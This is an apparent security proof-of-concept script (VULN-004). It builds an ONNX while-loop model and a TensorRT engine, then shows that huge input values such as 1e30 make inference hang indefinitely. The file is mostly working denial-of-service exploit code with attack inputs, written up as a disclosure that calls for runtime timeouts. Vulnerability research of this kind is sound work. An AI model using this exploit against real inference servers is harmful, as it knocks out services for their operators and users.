"""
VULN-004 PoC: TensorRT Input-Controlled Denial of Service via While-Loop Models
A structurally valid ONNX model using a condition-dependent Loop operator hangs
indefinitely during inference when given a malicious input value. The model itself
is indistinguishable from a legitimate while-loop model.
This is DISTINCT from VULN-003 (static Loop trip count):
- VULN-003: Malicious MODEL with INT64_MAX max_trip_count -> always hangs
- VULN-004: Normal MODEL + malicious INPUT -> hangs based on input value
- VULN-003 fix (validate max_trip_count at build) does NOT prevent VULN-004
- VULN-004 requires runtime protection (inference timeout / iteration budget)
Attack scenarios:
1. Production model uses while-loop for variable-length processing
2. Attacker sends input with extreme counter value (e.g., 1e30)
3. Inference hangs indefinitely — DoS on the inference server
4. Affects TensorRT-LLM (autoregressive generation uses loops)
5. Affects any TRT model with data-dependent loop termination
Impact:
- Any TRT model using condition-dependent loops is vulnerable
- Attacker only needs to craft the INPUT, not the model
- Tiny payload (single float32 value) causes permanent hang
- No inference timeout in execute_async_v3()
"""
import os
import sys
import time
import subprocess
import numpy as np
import onnx
from onnx import helper, TensorProto, numpy_helper
# Absolute path of the directory containing this script; main() writes the
# generated .onnx and .engine files here.
POC_DIR = os.path.dirname(os.path.abspath(__file__))
def create_while_loop_model():
    """Build an ONNX model whose Loop counts a scalar float input down to zero.

    The graph has one float32 scalar input, ``counter``, which seeds the
    loop-carried value.  Every iteration subtracts 1.0 and keeps looping while
    the result is still greater than 0.0; the last value is exposed as the
    float32 scalar ``output``.  The static trip-count bound is INT64_MAX, so
    termination is expected to come from the data-dependent condition.

    With a small counter (e.g. 10) the loop runs 10 times and yields 0.  With
    a huge counter (e.g. 1e30) it keeps running for an astronomical number of
    iterations.

    NOTE(review): assuming the engine evaluates ``Sub`` in IEEE-754 float32
    (24-bit significand), a counter far above 2**24 no longer changes when 1.0
    is subtracted, so such inputs would only ever stop at the INT64_MAX bound
    -- confirm against the target runtime.

    Returns:
        The ONNX model (opset 13, IR version 7).
    """
    # Constants used inside the loop body.
    one = numpy_helper.from_array(np.array(1.0, dtype=np.float32), 'one')
    zero = numpy_helper.from_array(np.array(0.0, dtype=np.float32), 'zero')

    # Body computation: x_out = x_in - 1.0 ; cond_out = (x_out > 0.0)
    decrement = helper.make_node('Sub', ['x_in', 'one'], ['x_out'])
    still_positive = helper.make_node('Greater', ['x_out', 'zero'], ['cond_out'])

    # Loop body signature: (iteration index, condition, carried value)
    # -> (next condition, next carried value).
    body_inputs = [
        helper.make_tensor_value_info('i', TensorProto.INT64, []),
        helper.make_tensor_value_info('cond_in', TensorProto.BOOL, []),
        helper.make_tensor_value_info('x_in', TensorProto.FLOAT, []),
    ]
    body_outputs = [
        helper.make_tensor_value_info('cond_out', TensorProto.BOOL, []),
        helper.make_tensor_value_info('x_out', TensorProto.FLOAT, []),
    ]
    loop_body = helper.make_graph(
        [decrement, still_positive],
        'while_body',
        body_inputs,
        body_outputs,
        [one, zero],
    )

    # Outer graph: trip count is INT64_MAX, the initial condition is True, and
    # the caller-supplied `counter` is the only runtime input.
    trip_limit = numpy_helper.from_array(
        np.array(np.iinfo(np.int64).max, dtype=np.int64), 'max_trip'
    )
    start_cond = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')
    loop_node = helper.make_node(
        'Loop',
        ['max_trip', 'cond_init', 'counter'],
        ['output'],
        body=loop_body,
    )

    graph_inputs = [helper.make_tensor_value_info('counter', TensorProto.FLOAT, [])]
    graph_outputs = [helper.make_tensor_value_info('output', TensorProto.FLOAT, [])]
    outer_graph = helper.make_graph(
        [loop_node], 'while_loop', graph_inputs, graph_outputs,
        [trip_limit, start_cond],
    )

    onnx_model = helper.make_model(
        outer_graph, opset_imports=[helper.make_opsetid('', 13)]
    )
    onnx_model.ir_version = 7
    return onnx_model
def create_accumulator_model():
    """Build an ONNX model that adds 1.0 to an accumulator until it hits a target.

    The graph takes two float32 scalar inputs, ``init_value`` and ``target``.
    Each Loop iteration adds the constant step 1.0 to the accumulator and
    continues while the new value is still less than the target, which is
    carried through the loop unchanged.  The outputs are ``final_acc`` and
    ``target_passthrough``.  The static trip-count bound is INT64_MAX.

    A normal target (e.g. 100) terminates quickly; a malicious one (e.g. 1e38)
    keeps the loop running effectively forever.

    NOTE(review): assuming IEEE-754 float32 addition in the engine, the
    accumulator stops growing around 2**24, so any larger target would never
    be reached and only the INT64_MAX bound would end the loop -- confirm
    against the target runtime.

    Returns:
        The ONNX model (opset 13, IR version 7).
    """

    def scalar(name, elem_type):
        # Rank-0 tensor description used for every graph input/output here.
        return helper.make_tensor_value_info(name, elem_type, [])

    # Body computation: acc_out = acc_in + step ; cond_out = (acc_out < target_in)
    body_nodes = [
        helper.make_node('Add', ['acc_in', 'step'], ['acc_out']),
        helper.make_node('Less', ['acc_out', 'target_in'], ['cond_out']),
    ]
    body_inputs = [
        scalar('i', TensorProto.INT64),
        scalar('cond_in', TensorProto.BOOL),
        scalar('acc_in', TensorProto.FLOAT),
        scalar('target_in', TensorProto.FLOAT),
    ]
    # `target_in` is listed as an output too, so it is carried to the next
    # iteration unchanged.
    body_outputs = [
        scalar('cond_out', TensorProto.BOOL),
        scalar('acc_out', TensorProto.FLOAT),
        scalar('target_in', TensorProto.FLOAT),
    ]
    step = numpy_helper.from_array(np.array(1.0, dtype=np.float32), 'step')
    loop_body = helper.make_graph(
        body_nodes, 'accum_body', body_inputs, body_outputs, [step]
    )

    # Outer graph: both loop-carried values come from runtime inputs.
    trip_limit = numpy_helper.from_array(
        np.array(np.iinfo(np.int64).max, dtype=np.int64), 'max_trip'
    )
    start_cond = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')
    loop_node = helper.make_node(
        'Loop',
        ['max_trip', 'cond_init', 'init_value', 'target'],
        ['final_acc', 'target_passthrough'],
        body=loop_body,
    )

    outer_graph = helper.make_graph(
        [loop_node],
        'accumulator',
        [scalar('init_value', TensorProto.FLOAT), scalar('target', TensorProto.FLOAT)],
        [scalar('final_acc', TensorProto.FLOAT),
         scalar('target_passthrough', TensorProto.FLOAT)],
        [trip_limit, start_cond],
    )

    onnx_model = helper.make_model(
        outer_graph, opset_imports=[helper.make_opsetid('', 13)]
    )
    onnx_model.ir_version = 7
    return onnx_model
def build_engine(model_path, engine_path):
    """Parse an ONNX file with TensorRT and write the serialized engine to disk.

    Args:
        model_path: Path of the ONNX model to parse.
        engine_path: Destination file for the serialized engine bytes.

    Returns:
        True when the engine was built and written.  False when ONNX parsing
        or the engine build failed; a diagnostic is printed in either case
        and nothing is written.
    """
    # TensorRT is imported at call time rather than at module import.
    import tensorrt as trt

    trt_logger = trt.Logger(trt.Logger.WARNING)
    builder = trt.Builder(trt_logger)
    explicit_batch = 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
    network = builder.create_network(explicit_batch)
    onnx_parser = trt.OnnxParser(network, trt_logger)

    parsed_ok = onnx_parser.parse_from_file(model_path)
    if not parsed_ok:
        # Report every parser error before giving up.
        for idx in range(onnx_parser.num_errors):
            print(f" Parse error: {onnx_parser.get_error(idx)}")
        return False

    build_config = builder.create_builder_config()
    # Workspace pool limit: 1 << 24 bytes (16 MiB).
    build_config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 24)

    plan = builder.build_serialized_network(network, build_config)
    if not plan:
        print(" Build failed")
        return False

    with open(engine_path, 'wb') as engine_file:
        engine_file.write(bytes(plan))
    return True
def test_inference(engine_path, counter_value, timeout=15):
    """Run one inference in a child Python process and report whether it hung.

    The engine is executed in a separate interpreter so that a runaway loop
    can be cut off after ``timeout`` seconds instead of blocking this process.
    The engine path and the counter are handed to the child through
    ``sys.argv`` rather than being pasted into its source text, so a path
    containing quote characters or a non-finite counter (``inf``/``nan``)
    cannot turn the child script into invalid Python.

    Args:
        engine_path: Path to the serialized TensorRT engine.
        counter_value: Number fed to the engine's ``counter`` input; it is
            converted with ``float()``.
        timeout: Seconds to wait for the child before declaring a hang.

    Returns:
        A tuple ``(hung, elapsed, out, rc)``:
          * ``hung`` -- True only when the child exceeded ``timeout``.
          * ``elapsed`` -- wall-clock seconds spent waiting for the child.
          * ``out`` -- the child's stripped stdout; if the child failed
            without printing anything, the last line of its stderr; the
            literal ``"TIMEOUT"`` on a hang.
          * ``rc`` -- the child's exit code, or -1 on a hang.
    """
    # Plain (non-f) string: nothing from the caller is interpolated into code.
    child_script = '''
import tensorrt as trt, torch, sys, time
engine_path = sys.argv[1]
counter_value = float(sys.argv[2])
with open(engine_path, "rb") as f:
    data = f.read()
logger = trt.Logger(trt.Logger.ERROR)
runtime = trt.Runtime(logger)
engine = runtime.deserialize_cuda_engine(data)
if not engine:
    print("DESER_FAIL"); sys.exit(1)
context = engine.create_execution_context()
device = torch.device("cuda:0")
counter = torch.tensor(counter_value, dtype=torch.float32, device=device)
output = torch.empty(1, dtype=torch.float32, device=device)
context.set_tensor_address("counter", counter.data_ptr())
context.set_tensor_address("output", output.data_ptr())
stream = torch.cuda.current_stream()
print("INFERENCE_STARTED")
sys.stdout.flush()
start = time.time()
context.execute_async_v3(stream.cuda_stream)
stream.synchronize()
elapsed = time.time() - start
print(f"DONE time={elapsed:.3f}s output={output.item():.1f}")
'''
    # repr() of a float round-trips exactly through float() in the child.
    argv = [
        sys.executable, "-c", child_script,
        str(engine_path), repr(float(counter_value)),
    ]

    # Monotonic clock: the measured interval cannot be skewed by wall-clock
    # adjustments while the child is running.
    started = time.monotonic()
    try:
        proc = subprocess.run(
            argv, capture_output=True, text=True, timeout=timeout
        )
    except subprocess.TimeoutExpired:
        return True, time.monotonic() - started, "TIMEOUT", -1
    elapsed = time.monotonic() - started

    out = proc.stdout.strip()
    if not out and proc.returncode != 0:
        # The child died before printing anything (import error, missing
        # engine file, CUDA failure, ...): surface the reason instead of
        # returning an empty string.
        err_lines = proc.stderr.strip().splitlines()
        if err_lines:
            out = err_lines[-1]
    return False, elapsed, out, proc.returncode
def _last_output_line(out, rc):
    """Return the last line of *out*, or ``rc=<code>`` when *out* is empty."""
    # splitlines() yields [] for an empty string, unlike split('\n') which
    # yields [''] and would make the rc fallback unreachable.
    lines = out.splitlines()
    return lines[-1] if lines else f"rc={rc}"


def main():
    """Run the full PoC: build the model and engine, then probe it with inputs.

    Steps:
      1. Write the while-loop ONNX model next to this script.
      2. Build a TensorRT engine from it (exits with status 1 on failure).
      3. Run inference with small counters.
      4. Run inference with increasingly large counters and report timeouts.
      5. Print an explanatory summary.

    The generated ``while_loop.onnx`` and ``while_loop.engine`` files are left
    on disk.
    """
    print("=" * 70)
    print("VULN-004: Input-Controlled DoS via While-Loop Models")
    print("=" * 70)

    # Step 1: Create the while-loop model
    model = create_while_loop_model()
    onnx_path = os.path.join(POC_DIR, "while_loop.onnx")
    with open(onnx_path, 'wb') as f:
        f.write(model.SerializeToString())
    onnx_size = os.path.getsize(onnx_path)
    print(f"\n[1] While-loop ONNX model: {onnx_path}")
    print(f" Size: {onnx_size} bytes")
    print(" Behavior: Counts down from input value to 0")
    print(" Structure: Perfectly valid -- common ML pattern")

    # Step 2: Build TensorRT engine
    engine_path = os.path.join(POC_DIR, "while_loop.engine")
    print("\n[2] Building TensorRT engine...")
    if not build_engine(onnx_path, engine_path):
        print(" ERROR: Build failed")
        sys.exit(1)
    engine_size = os.path.getsize(engine_path)
    print(f" Engine: {engine_path}")
    print(f" Size: {engine_size} bytes")
    print(" Build completed normally -- model is structurally valid")

    # Step 3: Normal usage (benign inputs)
    print("\n[3] Normal inference with benign inputs")
    for counter_val in [10, 100, 1000]:
        _, elapsed, out, rc = test_inference(
            engine_path, float(counter_val), timeout=10
        )
        result = _last_output_line(out, rc)
        print(f" counter={counter_val:>6d}: {result} ({elapsed:.2f}s)")

    # Step 4: DoS attack (malicious input)
    print("\n[4] DoS attack with malicious inputs")
    attack_inputs = [
        (1e6, "1 million iterations"),
        (1e9, "1 billion iterations"),
        (1e15, "1 quadrillion iterations"),
        (1e30, "1e30 iterations (astronomical)"),
        (3.4e38, "FLT_MAX iterations (maximum float32)"),
    ]
    # The description strings label each case for the reader; they are not
    # printed.
    for counter_val, _desc in attack_inputs:
        hung, elapsed, out, rc = test_inference(engine_path, counter_val, timeout=15)
        if hung:
            print(f" counter={counter_val:>12.0e}: TIMEOUT after {elapsed:.1f}s — HANGING")
        else:
            result = _last_output_line(out, rc)
            print(f" counter={counter_val:>12.0e}: {result} ({elapsed:.1f}s)")

    # Step 5: Show the attack is input-dependent
    print("\n[5] Same model, same engine — behavior depends entirely on input")
    print(" counter=10 -> completes instantly (10 iterations)")
    print(" counter=1e30 -> hangs for 1e30 iterations")
    print(" At 1 billion iterations/sec: 3.17e13 YEARS")

    # Summary
    print(f"\n{'='*70}")
    print("VULNERABILITY SUMMARY")
    print(f"{'='*70}")
    print("[!!!] Input-controlled DoS via while-loop model")
    print("[!!!] Model is structurally VALID — cannot be detected by static analysis")
    print(f"[!!!] ONNX size: {onnx_size} bytes | Engine size: {engine_size} bytes")
    print("[!!!] DoS triggered by input value, NOT by model structure")
    print("[!!!] VULN-003 fix (validate max_trip_count) does NOT prevent this")
    print("[!!!] Requires runtime protection: inference timeout / iteration budget")
    print("[!!!] Affects any TRT model using data-dependent loops")
    print("[!!!] Relevant to TensorRT-LLM autoregressive generation")

    # No cleanup: the while_loop.onnx / while_loop.engine files are kept on
    # purpose as evidence.
# Run the PoC only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()
|